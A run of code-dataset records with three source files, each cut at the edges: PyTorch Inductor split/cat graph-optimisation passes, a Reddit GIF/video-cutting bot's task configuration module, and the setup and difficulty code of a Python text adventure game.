List[int], dim: int\n):\n graph = match.graph\n split = next(node for node in match.nodes if node.target == torch.split)\n if not all(s == 1 for s in split_sizes):\n return\n if isinstance(dim, Sequence):\n return\n next_users = find_next_users(split)\n if not all(node.target == torch.squeeze for node in next_users):\n return\n with graph.inserting_before(match.output_node()):\n unbind = graph.call_function(\n torch.unbind, args=(split_input,), kwargs={\"dim\": dim}\n )\n for item_index, getitem_node in sorted(\n [\n (getitem_node.args[1], getitem_node)\n for getitem_node in split.users.keys()\n ]\n ):\n squeeze = next(iter(getitem_node.users.keys()))\n new_get_item = graph.call_function(\n operator.getitem, args=(unbind, item_index)\n )\n squeeze.replace_all_uses_with(new_get_item)\n new_get_item.meta.update(squeeze.meta)\n graph.erase_node(squeeze)\n graph.erase_node(getitem_node)\n graph.erase_node(split)\n counters[\"inductor\"][\"split_squeeze_replaced\"] += 1\n\n\ngetitem_unbind = ListOf(\n GetItem(\n CallFunction(\n torch.unbind,\n KeywordArg(\"unbind_input\"),\n dim=KeywordArg(\"dim\"),\n _users=MULTIPLE,\n ),\n Ignored(),\n _users=MULTIPLE,\n ),\n partial=True,\n)\n\n\n@register_graph_pattern(\n CallFunction([torch.stack, torch.cat], getitem_unbind, Ignored(), _users=MULTIPLE),\n pass_dict=unbind_stack_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat], getitem_unbind, dim=Ignored(), _users=MULTIPLE\n ),\n pass_dict=unbind_stack_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat], tensors=getitem_unbind, dim=Ignored(), _users=MULTIPLE\n ),\n pass_dict=unbind_stack_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_unbind_stack(match: Match, unbind_input: torch.fx.Node, dim: int):\n unbind_node = next(node for node in match.nodes if node.target == torch.unbind)\n UnbindCatRemover().remove_unbind(match.graph, unbind_node)\n\n\ngetitem_split = ListOf(\n CallFunction(\n operator.getitem,\n TorchSplit(\n Ignored(),\n KeywordArg(\"split_sections\"),\n ),\n Ignored(),\n _users=MULTIPLE,\n ),\n partial=True,\n)\n\n\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat],\n tensors=getitem_split,\n dim=Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=split_cat_pass,\n 
extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat],\n getitem_split,\n dim=Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat],\n getitem_split,\n Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef simplify_split_cat(match: Match, split_sections: List[int], dim: int):\n if not isinstance(split_sections, (list, tuple)): # Unnormalized split\n return\n split_node = next(node for node in match.nodes if node.target == torch.split)\n SplitCatSimplifier().simplify(match.graph, split_node, split_sections)\n\n\n# noqa: W605\n# ############The pattern to be optimized is#########\n\n# split_node(dim=1)\n# / \\ ... / \\\n# getitem getitem getitem getitem -> user=1\n# \\ / \\ /\n# cat (user=mul, dim=1) cat(user=mul, dim=1)\n# | \\ | \\\n\n# ################After transformation#############\n\n# split_node(dim=1)\n# / ... \\\n# getitem getitem\n# | \\ | \\\n\n\ndef safe_to_abort_node(node: torch.fx.Node):\n \"\"\"\n 1. the input nodes of the node should come from the same parent\n 2. the user of all the input nodes should be only one\n \"\"\"\n prev_node = None\n for arg in node.args[0]:\n if len(arg.users) != 1 or arg.target != operator.getitem:\n return False\n if prev_node is None:\n prev_node = arg.args[0]\n else:\n if arg.args[0] != prev_node:\n return False\n return True\n\n\ndef remove_zeros(split_sections: List[int]):\n \"\"\"\n Remove zeros from the list and get the index mapping dict from getitem\n in split node to getitem in new split node\n \"\"\"\n new_split_sections, index_mapping = [], {}\n idx = 0\n for i in range(len(split_sections)):\n if split_sections[i] > 0:\n new_split_sections.append(split_sections[i])\n index_mapping[i] = idx\n idx += 1\n\n return new_split_sections, index_mapping\n\n\n@register_graph_pattern(\n CallFunction(\n torch.cat,\n getitem_split,\n dim=Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=merge_getitem_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_getitem_cat(match: Match, split_sections: List[int], dim: int):\n if not isinstance(split_sections, (list, tuple)): # Unnormalized split\n return\n graph = match.graph\n split_node = next(node for node in match.nodes if node.target == torch.split)\n split_input, split_size, split_dim = _get_split_args_default(split_node)\n # if the cat and split have different dims, return\n # Find the next users (i.e. users after the getitem)\n next_users = find_next_users(split_node)\n # 'immutable_list' object does not support mutation. 
Create a new copy of it\n    split_sections = list(split_sections)\n    for cat_user in next_users:\n        if cat_user.target == torch.cat:\n            cat_dim = get_arg_value(cat_user, 1, \"dim\")\n            if split_dim != cat_dim:\n                continue\n            # check that all getitems in the cat_user come from the same node\n            if not safe_to_abort_node(cat_user):\n                continue\n            # find the indices of the getitems to be cat'ed/stacked\n            indices = []\n            for arg in cat_user.args[0]:\n                indices.append(arg.args[1])\n            # indices may not necessarily be sorted, so we sort them first\n            indices.sort()\n            # update the arg of the cat user, only keep the first getitem\n            cat_user.update_arg(0, cat_user.args[0][0])\n            # calculate the fused tensor size over the indices\n            fused_tensor_size = 0\n            for i in range(len(split_node.args[1])):\n                if i in indices:\n                    fused_tensor_size += split_node.args[1][i]\n            # update the split sections\n            split_sections[indices[0]] = fused_tensor_size\n            # pad the others with zeros to keep the same list size\n            for i in indices[1:]:\n                split_sections[i] = 0\n            # remove all unused indexes in the split_node\n            new_split_sections, index_mapping = remove_zeros(split_sections)\n            with graph.inserting_after(split_node):\n                new_split_node = graph.call_function(\n                    torch.split,\n                    args=(split_input, split_sections),\n                    kwargs={\"dim\": split_dim},\n                )\n                split_node.replace_all_uses_with(new_split_node)\n                new_split_node.meta.update(split_node.meta)\n                # remove all unused getitem nodes\n                to_remove = [cat_user]\n                # dictionary keys changed during iteration\n                new_split_getitem_nodes = list(new_split_node.users.keys())\n                for getitem_node in new_split_getitem_nodes:\n                    if getitem_node.args[1] in indices[1:]:\n                        to_remove.append(getitem_node)\n                    # update meta data of getitem\n                    elif getitem_node.args[1] == indices[0]:\n                        cat_user.replace_all_uses_with(getitem_node)\n                        getitem_node.meta.update(cat_user.meta)\n                    else:\n                        # update getitem index for new split node\n                        getitem_node.update_arg(1, index_mapping[getitem_node.args[1]])\n                graph.erase_node(split_node)\n                for getitem_node in to_remove:\n                    graph.erase_node(getitem_node)\n                # update the split sections of the new split node\n                new_split_node.update_arg(1, new_split_sections)\n                split_node = new_split_node\n                split_sections = new_split_sections\n\n    counters[\"inductor\"][\"getitem_cat_merged\"] += 1\n\n\n# noqa: W605\n# ############The pattern to be optimized is#########\n# split_node (dim=1)\n#     /   ...   \\   ...    /        \\\n# getitem     getitem   getitem   getitem  -> user=1\n#     \\          /\n#     stack (dim=0)  -> user=1\n#          |\n#        tanh  -> user=1\n#          |\n#     unbind (dim=0)\n#          |\n\n# ################After transformation#############\n# split_node (dim=1)\n#     /   ...   /        \\\n# getitem    getitem   getitem  -> user=1\n#                         |\n#                       tanh\n#                         |\n#                       split\n#                         |\n\n\n@register_graph_pattern(\n    CallFunction(\n        torch.tanh,\n        CallFunction(\n            torch.stack,\n            getitem_split,\n            dim=Ignored(),\n            _users=1,\n        ),\n        _users=1,\n    ),\n    pass_dict=merge_getitem_cat_pass,\n    extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n    CallFunction(\n        torch.tanh,\n        CallFunction(\n            torch.stack,\n            tensors=getitem_split,\n            dim=Ignored(),\n            _users=1,\n        ),\n        _users=1,\n    ),\n    pass_dict=merge_getitem_cat_pass,\n    extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n    CallFunction(\n        torch.tanh,\n        CallFunction(\n            torch.stack,\n            getitem_split,\n            Ignored(),\n            _users=1,\n        ),\n        _users=1,\n    ),\n    pass_dict=merge_getitem_cat_pass,\n    extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_stack_tahn_unbind(match: Match, split_sections: List[int], dim: int):\n    if not isinstance(split_sections, (list, tuple)):  # Unnormalized split\n        return\n    graph = match.graph\n    split_node = next(node for node in match.nodes if node.target == torch.split)\n    split_input, split_size, split_dim = _get_split_args_default(split_node)\n    # Find the next users (i.e. users after the getitem)\n    next_users = find_next_users(split_node)\n    # 'immutable_list' object does not support mutation. Create a new copy of it\n    split_sections = list(split_sections)\n    for user in next_users:\n        # stack user only has one user\n        if user.target == torch.stack:\n            if not safe_to_abort_node(user):\n                continue\n            unbind_user = find_next_users(user)[0]\n            if unbind_user.target != torch.unbind:\n                continue\n            unbind_dim = get_arg_value(unbind_user, 1, \"dim\") or 0\n            stack_dim = get_arg_value(user, 1, \"dim\") or 0\n            # stack and unbind should have the same dim\n            if unbind_user.target != torch.unbind or stack_dim != unbind_dim:\n                continue\n            # find the indices of the getitems to be stacked\n            indices = []\n            split_sections_for_unbind = []\n            for arg in user.args[0]:\n                indices.append(arg.args[1])\n                split_sections_for_unbind.append(split_sections[arg.args[1]])\n            # update the arg of the stack user, only keep the first getitem\n            user.update_arg(0, user.args[0][0])\n            # calculate the fused tensor size over the indices\n            fused_tensor_size = 0\n            for i in range(len(split_node.args[1])):\n                if i in indices:\n                    fused_tensor_size += split_node.args[1][i]\n            # update the split sections\n            split_sections[indices[0]] = fused_tensor_size\n            # pad the others with zeros to keep the same list size\n            for i in indices[1:]:\n                split_sections[i] = 0\n            # remove all unused indexes in the split_node\n            new_split_sections, index_mapping = remove_zeros(split_sections)\n            with graph.inserting_after(split_node):\n                new_split_node = graph.call_function(\n                    torch.split,\n                    args=(split_input, split_sections),\n                    kwargs={\"dim\": split_dim},\n                )\n                replace_unbind_with_split = graph.call_function(\n                    torch.split,\n                    args=(unbind_user.args[0], split_sections_for_unbind),\n                    kwargs={\"dim\": split_dim},\n                )\n                unbind_user.replace_all_uses_with(replace_unbind_with_split)\n                replace_unbind_with_split.meta.update(unbind_user.meta)\n                # remove getitem and split, stack\n                split_node.replace_all_uses_with(new_split_node)\n                new_split_node.meta.update(split_node.meta)\n                # remove all unused getitem nodes\n                to_remove = [unbind_user]\n                # dictionary keys changed during iteration\n                new_split_getitem_nodes = list(new_split_node.users.keys())\n                for getitem_node in new_split_getitem_nodes:\n                    if getitem_node.args[1] in indices[1:]:\n                        to_remove.append(getitem_node)\n                    # update meta data of getitem\n                    elif 
getitem_node.args[1] == indices[0]:\n user.replace_all_uses_with(getitem_node)\n getitem_node.meta.update(user.meta)\n else:\n # update getitem index for new split node\n getitem_node.update_arg(1, index_mapping[getitem_node.args[1]])\n graph.erase_node(split_node)\n graph.erase_node(user)\n for getitem_node in to_remove:\n graph.erase_node(getitem_node)\n # update the split sections of new split node\n new_split_node.update_arg(1, new_split_sections)\n split_node = new_split_node\n split_sections = new_split_sections\n\n counters[\"inductor\"][\"stack_tahn_unbind_merged\"] += 1\n","repo_name":"pytorch/pytorch","sub_path":"torch/_inductor/fx_passes/split_cat.py","file_name":"split_cat.py","file_ext":"py","file_size_in_byte":50247,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11177624407","text":"import math\nimport os\nimport re\nfrom dataclasses import dataclass\nfrom io import BytesIO\nfrom typing import Dict, Callable, Tuple\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\nfrom urllib.parse import parse_qs, urlparse\n\nimport PIL\nimport requests\nfrom PIL.Image import Image\nfrom asyncpraw.models import Message\nfrom asyncpraw.models import Submission\nfrom bs4 import BeautifulSoup\n\nimport src.handler as handler_pkg\nimport src.model.result as result_pkg\nfrom src.model.media_type import MediaType\nfrom src.model.task_state import TaskConfigState\nfrom src.model.task_state import TaskState\nfrom src.util import exception, gif_utilities\nfrom src.util.aux import Watermark\nfrom src.util.aux import noop_image, fix_start_end_swap\nfrom src.util.aux import watermark_image\nfrom src.util.exception import TaskFailureException, OembedFailureException\nfrom src.util.logger import root_logger, task_logger\n\n\n@dataclass\nclass TaskConfig:\n \"\"\"A task configuration which is not serializable.\n\n Attributes:\n message The reddit message object.\n media_type The media type of the resource requested for cutting.\n start The start time in milliseconds from where to cut the MediaType.\n end The end time in milliseconds to stop the cut of the MediaType.\n watermark An optional callable that watermarks the cut media.\n state The state of this :class:~`TaskConfig`.\n is_oembed A flag indicating if the media is embedded via the oEmbed format (https://oembed.com/).\n is_video A flag indicating if the media is a video.\n is_gif A flag indicating if the media is a gif.\n is_crosspost A flag indicating if the media is crossposted.\n media_url The url to the media.\n duration The total duration of the media in seconds read from the `message`.\n extension The file extension of the media.\n \"\"\"\n message: Message\n media_type: MediaType\n start: float\n end: Optional[float]\n watermark: Callable[[PIL.Image.Image], PIL.Image.Image]\n\n def __init__(\n self, message: Message, start: float, end: Optional[float], media_type: MediaType, watermark:\n Optional[Watermark] = None\n ):\n self.message = message\n self.media_type = media_type\n self.__is_video = self.media_type in [MediaType.MP4, MediaType.MOV, MediaType.WEBM]\n self.__is_gif = self.media_type == MediaType.GIF\n if hasattr(message.submission, 'crosspost_parent'):\n self.__is_crosspost = message.submission.crosspost_parent is not None\n else:\n self.__is_crosspost = False\n start_ms, end_ms = fix_start_end_swap(start=start, end=end)\n start_ms = max(start_ms, 0) # put a realistic lower bound on end\n if self.duration is not None:\n # duration could 
be None here, will be computed in the specific handler\n end_ms = min(end_ms or math.inf, self.duration * 1000) # put a realistic upper bound on end\n self.start = start_ms\n self.end = end_ms\n self.watermark = noop_image if watermark is None else lambda img: watermark_image(img, watermark)\n self._state = TaskConfigState.VALID\n\n def __repr__(self) -> str:\n return f'TaskConfig(message: {self.message}, media_type: {self.media_type}, start: {self.start}, ' \\\n f'end: {self.end}, watermark: {self.watermark}, state: {self.state}, is_oembed: {self.is_oembed}, ' \\\n f'is_video: {self.is_video}, is_gif: {self.is_gif}, is_crosspost: {self.is_crosspost}, ' \\\n f'duration: {self.duration}, extension: {self.extension}, media_url: {self.media_url})'\n\n @property\n def state(self) -> TaskConfigState:\n return self._state\n\n def is_state(self, state: Union[TaskConfigState, List[TaskConfigState]]) -> bool:\n return self._state in state if state is List else self._state == state\n\n @property\n def is_oembed(self) -> bool:\n # full oembed spec: https://oembed.com/#section2\n # media is a dynamic attribute on submission\n if not hasattr(self.message.submission, 'media'):\n return False\n return bool(self.message.submission.media.get('oembed', False))\n\n @property\n def is_video(self) -> bool:\n return self.__is_video\n\n @property\n def is_gif(self) -> bool:\n return self.__is_gif\n\n @property\n def is_crosspost(self) -> bool:\n return self.__is_crosspost\n\n @property\n def media_url(self) -> str:\n # todo do this in __init__ and store in a \"_variable\"\n _submission: Submission = self.message.submission\n if self.is_oembed:\n return self.__get_oembed()[0]\n elif self.is_gif:\n if self.is_crosspost:\n return '' # todo\n else:\n return _submission.url\n elif self.is_video:\n if self.is_crosspost:\n reddit_video = _submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = _submission.secure_media.get('reddit_video', {})\n media_url = reddit_video.get('fallback_url', '')\n if media_url == '':\n self._state = TaskConfigState.INVALID\n return media_url\n else:\n raise exception.TaskConfigFailureException('Cannot parse attribute media_url.')\n\n @property\n def duration(self) -> Optional[float]:\n # todo do this in __init__ and store in a \"_variable\"\n if self.is_gif:\n # AFAIK there is no duration sent when we are dealing with a GIF\n with requests.get(self.media_url, stream=True) as resp:\n if resp.ok:\n self._state = TaskConfigState.VALID\n # read whole file via StreamReader into BytesIO\n _stream = BytesIO(resp.raw.read())\n _stream.seek(0)\n return gif_utilities.get_gif_duration(image=PIL.Image.open(_stream))\n else:\n self._state = TaskConfigState.INVALID\n return math.nan\n elif self.is_video:\n _submission: Submission = self.message.submission\n if self.is_crosspost:\n reddit_video = _submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = _submission.secure_media.get('reddit_video', {})\n return reddit_video.get('duration')\n else:\n # self._state = TaskState.INVALID # duration will be computed in the specific handler if None\n return None\n\n @property\n def extension(self) -> Optional[str]:\n # todo do this in __init__ and store in a \"_variable\"\n ext: Optional[str]\n _submission: Submission = self.message.submission\n if self.is_oembed:\n return self.__get_oembed()[-1]\n elif self.is_gif:\n if self.is_crosspost:\n ext = None # todo how to handle crossposted gifs?\n else:\n ext = 
os.path.splitext(_submission.url)[-1][1:]\n elif self.is_video:\n if self.is_crosspost:\n # todo make sure it always works with index 0 (should be the first post)\n reddit_video = _submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = _submission.secure_media.get('reddit_video', {})\n ext = os.path.splitext(reddit_video.get('scrubber_media_url', [' ']))[-1][1:]\n else:\n self._state = TaskState.INVALID\n ext = None\n if ext == '' or ext is None:\n ext = None\n self._state = TaskConfigState.INVALID\n return ext\n\n def __get_oembed(self) -> Tuple[str, str, str]:\n \"\"\"Returns a tuple with the source url, the media MIME-type and the media extension.\n \"\"\"\n oembed: Dict = self.message.submission.media.get('oembed', {})\n html_string: str\n try:\n html_string = oembed['html']\n except KeyError:\n html_string = oembed['url']\n if not isinstance(html_string, str):\n task_logger.error('Failed to obtain the HTML of the oEmbed.')\n soup = BeautifulSoup(html_string, features='html.parser')\n try:\n # todo proper error handling! this has only been validated with gfycat\n src_url = parse_qs(urlparse(soup.iframe.get('src'))[4]).get('src')[0]\n another_soup = BeautifulSoup(requests.get(src_url).content, features='html.parser')\n source_tag = another_soup.video.findAll(name='source')[1]\n ext: str = os.path.splitext(source_tag['src'])[-1][1:]\n return source_tag['src'], source_tag['type'], ext\n except Exception as ex:\n task_logger.error(f'Encountered oEmbed provider {oembed.get(\"provider_name\")}.\\n{ex}')\n raise OembedFailureException()\n\n\nclass TaskConfigFactory(TaskConfig):\n state: TaskConfigState = TaskConfigState.VALID\n\n @classmethod\n def from_message(cls, message: Message) -> TaskConfig:\n _config = {\n 'message': message,\n 'media_type': cls.__get_media_type(message),\n **cls.__parse_start_and_end(message),\n }\n return TaskConfig(**_config)\n\n @classmethod\n def __is_crosspost(cls, message: Message) -> bool:\n if hasattr(message.submission, 'crosspost_parent'):\n return message.submission.crosspost_parent is not None\n return False\n\n @classmethod\n def __is_video(cls, message: Message) -> bool:\n if cls.__is_crosspost(message=message):\n return message.submission.crosspost_parent_list[-1].get('is_video', False)\n return message.submission.is_video\n\n @classmethod\n def __is_gif(cls, message: Message) -> bool:\n if cls.__is_crosspost(message=message):\n return False # todo\n if message.submission.url:\n return os.path.splitext(message.submission.url)[-1][1:] == 'gif'\n return False\n\n @classmethod\n def __is_oembed(cls, message: Message):\n # full oembed spec: https://oembed.com/#section2\n # media is a dynamic attribute on submission\n if not hasattr(message.submission, 'media'):\n return False\n return bool(message.submission.media.get('oembed', False))\n\n @classmethod\n def __parse_start_and_end(cls, message: Message) -> Dict[str, float]:\n params = {}\n pattern = re.compile(r'(s|start)=([\\d]+) (e|end)=([\\d]+)', re.IGNORECASE)\n matches = pattern.search(message.body)\n if matches is None:\n root_logger.warning('Skipping message because no match was found.')\n cls.state = TaskConfigState.INVALID\n return {}\n root_logger.debug(f'Found pattern matches: {matches.groups()}')\n params['start'] = int(matches.group(2))\n params['end'] = int(matches.group(4))\n return params\n\n @classmethod\n def __get_media_type(cls, message: Message) -> Union[MediaType, None]:\n if cls.__is_video(message=message):\n # get video from original post 
(apparently we can only get it from there so we do the the backtrace)\n if cls.__is_crosspost(message=message):\n reddit_video = message.submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = message.submission.secure_media.get('reddit_video', {})\n ext: str = os.path.splitext(reddit_video.get('scrubber_media_url', [' ']))[-1][1:]\n if ext == '':\n cls.state = TaskConfigState.INVALID\n return None\n return MediaType[ext.upper()]\n elif cls.__is_gif(message=message):\n return MediaType.GIF\n elif cls.__is_oembed(message=message):\n oembed: Dict = message.submission.media.get('oembed', {})\n html_string: str\n try:\n html_string = oembed['html']\n except KeyError:\n html_string = oembed['url']\n if not isinstance(html_string, str):\n task_logger.error('Failed to obtain the HTML of the oEmbed.')\n soup = BeautifulSoup(html_string, features='html.parser')\n try:\n # todo proper error handling! this has only been validated with\n src_url = parse_qs(urlparse(soup.iframe.get('src'))[4]).get('src')[0]\n another_soup = BeautifulSoup(requests.get(src_url).content, features='html.parser')\n source_tag = another_soup.video.findAll(name='source')[1]\n ext: str = os.path.splitext(source_tag['src'])[-1][1:]\n return MediaType[ext.upper()]\n except Exception as ex:\n task_logger.error(f'Encountered oEmbed provider {oembed.get(\"provider_name\")}.\\n{ex}')\n else:\n cls.state = TaskConfigState.INVALID\n return None\n\n\nclass Task(object):\n def __init__(self, config: TaskConfig):\n self.__config: TaskConfig = config\n self._task_state = TaskState.VALID\n self._select_handler()\n\n def __call__(self, *args, **kwargs):\n return self.handle()\n\n @property\n def state(self):\n return self._task_state\n\n def is_state(self, state: Union[TaskState, List[TaskState]]) -> bool:\n if state is List:\n return self._task_state in state\n return self._task_state == state\n\n def _select_handler(self):\n mt: MediaType = self.__config.media_type\n if mt == MediaType.GIF:\n self._task_handler = handler_pkg.gif.GifCutHandler()\n elif mt in [MediaType.MP4, MediaType.MOV, MediaType.WEBM]:\n self._task_handler = handler_pkg.video.VideoCutHandler()\n else:\n self._task_state = TaskState.DROP\n # self._task_handler = TestCutHandler()\n root_logger.warning(f'No handler for media type: {mt}')\n\n def handle(self) -> result_pkg.Result:\n _stream: Optional[BytesIO] = self._fetch_stream()\n if self._task_state == TaskState.INVALID:\n raise TaskFailureException('Failed to fetch stream from host!')\n _result: result_pkg.Result = self._task_handler.cut(stream=_stream, config=self.__config)\n self._task_state = TaskState.DONE\n return _result\n\n def _fetch_stream(self) -> Optional[BytesIO]:\n _stream: BytesIO\n media_url: str = self.__config.media_url\n with requests.get(media_url, stream=True) as r:\n if r.status_code == 200:\n self._task_state = TaskState.VALID\n _stream = BytesIO(r.raw.read())\n else:\n self._task_state = TaskState.INVALID\n return None\n return _stream\n\n @property\n def config(self):\n return self.__config\n","repo_name":"tahesse/gifCutterBot","sub_path":"src/execution/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":15074,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"74058221672","text":"\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Forest's and Nåså's #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # # 
# # # # # # # # # # # # # # # # # # # # # # # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Gameloop and setting up the game. #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # \n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n#\n# File that starts the game, sets up the game and contains the game loop.\n# Contains the gamestate class which contains the objects from the other classes.\n#\n\nimport time, sys, random\nimport gm_combat, gm_map, gm_items, gm_scenarios, gm_locations, gm_charstats\nimport gm_badguys\n\nSLEEPTIMER = 1 # Global variable used for changing the speed of the cascading print function,\n# and time.sleep(sleeptimer)\n\n\nclass Gamestate():\n def __init__(self):\n # Groups up all game information in one class, so that it can be passed around in the functions.\n self.scenarioIndex = 0 # Index to iterate over scenarios\n self.scenario = gm_scenarios.SCENARIOS[self.scenarioIndex] # Inserts the dictionary of the scenario\n self.player = gm_charstats.Player()\n self.map = gm_map.WorldMap(self.scenario, self.scenarioIndex)\n self.payexMode = False\n self.gameIsDone = False\n self.enemy = []\n self.enemyIndex = len(self.enemy) - 1\n self.sleepTimer = 1\n\n\n def iterateScenario(self):\n # updates gamestate when you change to the next scenario. \n if self.scenarioIndex == len(gm_scenarios.SCENARIOS) - 1:\n # If you are at the last scenario, start from the first one again.\n self.scenarioIndex = 0\n self.scenario = gm_scenarios.SCENARIOS[self.scenarioIndex] # Inserts the dictionary of the scenario\n self.map = gm_map.WorldMap(self.scenario, self.scenarioIndex) # set up the next map based on the dictionary in self.scenario\n self.map.victory = False # reset victory flag\n gm_map.printThis(gm_scenarios.ENDING_MSG)\n \n else:\n self.scenarioIndex += 1\n self.scenario = gm_scenarios.SCENARIOS[self.scenarioIndex] # Inserts the dictionary of the scenario\n self.map = gm_map.WorldMap(self.scenario, self.scenarioIndex) # set up the next map based on the dictionary in self.scenario\n self.map.victory = False # reset victory flag\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # Setting up player #\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef enterPlayerName(gameState):\n #starts the game, prompts for user to enter player name and calls playerStartingStats()\n playerName = \"\"\n # Set player name, with input validation.\n while len(playerName) == 0:\n playerName = (input('Please enter player name: ').lower())\n for letter in playerName:\n if letter in 'abcdefghijklmnopqrstuvwxyzæøå ':\n gameState.player.name = playerName\n else:\n print(\"Name must be written with letters, avoid numbers and special characters\")\n playerName = \"\"\n \n\ndef setPlayerAttributes(gameState):\n # Set the starting attributes of the newPlayer\n getStartingStats(gameState.player)\n # update player stats based on the changes done prior.\n gameState.player.playerArmChange()\n gameState.player.playerHpChange()\n gameState.player.setupModifiers()\n # gameState is returned to the main() function.\n return gameState\n\n\ndef getStartingStats(gameState):\n # Setting the starting stats of the player. 
Default max attribute points (variable: totalPointsAllocated) are changed by difficulty settings.\n    minPointsAllowedInOneStat = 1 # You cannot have less than 1 point in each stat.\n    maxPointsAllowedInOneStat = gameState.totalPointsAllocated - 2 # When setting starting stats, you cannot have all your points in one stat, at least 2 points are reserved for the last 2 stats.\n    modifiedmaxPointsAllowedInOneStat = gameState.totalPointsAllocated - 2 \n    totalPointsLeft = gameState.totalPointsAllocated \n    \n    # Setting variables for the calculation of allotted player stat points\n    str = 0 # Strength\n    agi = 0 # Agility\n    fort = 0 # Fortitude\n    print(\"\\nNow you have to enter your character's stats, they are Strength, Agility and Fortitude.\\nYou have %s points to distribute between the stats.\" % (gameState.totalPointsAllocated))\n    print(\"You can allocate 1-%s points to the first category.\\n\" % (maxPointsAllowedInOneStat))\n\n    # Calls getStartingAttribute which returns the value that the user enters for the strength stat\n    str = getStartingAttribute( \"Enter player strength: \", minPointsAllowedInOneStat, maxPointsAllowedInOneStat)\n    totalPointsLeft = totalPointsLeft - str\n    # Calculates the points that are left for the next stats and displays them to the user, the -1 is there to ensure that there is 1 point left for the last stat.\n    modifiedmaxPointsAllowedInOneStat = gameState.totalPointsAllocated - str - 1\n    \n    print(\"\\nYou have\",modifiedmaxPointsAllowedInOneStat,\"point(s) left to use for the next stat.\")\n    # Checks if there are fewer points available than the max points allowed, and if so sets total points left -1 (reserving 1 for the last stat) as the max points you can use for the next stat\n    if totalPointsLeft < modifiedmaxPointsAllowedInOneStat:\n        modifiedmaxPointsAllowedInOneStat = totalPointsLeft - 1\n    print()\n    # Calls getStartingAttribute which returns the value that the user enters for the agility stat\n    agi = getStartingAttribute( \"Enter player agility: \", minPointsAllowedInOneStat, modifiedmaxPointsAllowedInOneStat )\n    # calculates the total points that are left for use after setting the agility stat\n    totalPointsLeft = totalPointsLeft - agi\n    # assign the points that are left to fortitude.\n    fort = totalPointsLeft\n    # Call player stat change with the values that have been input by the user, to update the player. 
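\n    # [Editorial worked example, hedged] With medium difficulty\n    # (totalPointsAllocated = 6): maxPointsAllowedInOneStat = 6 - 2 = 4, so\n    # str is read from [1, 4]. If the player enters str=3, totalPointsLeft = 3\n    # and modifiedmaxPointsAllowedInOneStat = 6 - 3 - 1 = 2, so agi is read\n    # from [1, 2]. With agi=2, fort = 3 - 2 = 1 and all six points are spent.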
\n    gameState.playerStatChange(str, agi, fort)\n    time.sleep(SLEEPTIMER * 1)\n    print()\n\n\ndef getStartingAttribute(prompt, min_value, max_value):\n    # When starting the game, the player is prompted to enter a value for each of the different stats.\n    # This checks that the value is valid according to the bounds passed in from getStartingStats()\n    while True:\n        value = input(prompt)\n        if value.isnumeric():\n            value = int(value)\n            if value >= min_value and value <= max_value:\n                return value\n            else:\n                print(\"You entered a value that is too high, or too low.\")\n        else:\n            print(\"You did not enter a number, please enter a number.\")\n\n\ndef enterDifficulty(gameState):\n    # Set game difficulty, with input validation.\n    difficulty = ''\n    while True:\n        print('Please enter difficulty (easy, medium, hard): ', end='')\n        difficulty = input().lower()\n        if difficulty == 'easy' or difficulty == 'e':\n            gameState.player.totalPointsAllocated = 10\n            break\n        elif difficulty == 'medium' or difficulty == 'm':\n            break # totalPointsAllocated default = 6 so no change is needed.\n        elif difficulty == 'hard' or difficulty == 'h':\n            gameState.player.totalPointsAllocated = 4\n            break\n        elif difficulty == 'god': # god mode, for show and tell\n            gameState.player.totalPointsAllocated = 30\n            break\n        elif difficulty == 'debug': # Debug-ish mode, with more stats, and timers are reduced. To speed through states.\n            gameState.sleepTimer = 0.1\n            gameState.player.totalPointsAllocated = 30\n            break\n\n\ndef setPayexMode(gameState):\n    # Set payex mode, it's just for naming enemies differently. For funs.\n    mode = input('Do you want Payex names?: ').lower()\n    if mode == 'yes' or mode == 'y':\n        gameState.payexMode = True\n\n\n# ### End of player setup ###\n\n\ndef nextScenario(gameState):\n    # When a scenario is finished, initiate the next scenario.\n    gameState.iterateScenario() # Set up the next scenario in the gamestate object.\n    gameState.player.attributes.pl_current_hp = gameState.player.attributes.pl_maxhp # Reset player hp to max.\n    # Print scenario stuff\n    gm_map.printThis(gameState.scenario[\"intro\"])\n    input(\"\\nHit 'Enter' to continue...\")\n    gameLoop(gameState) # go back to the game loop after the setup is complete.\n\n\ndef 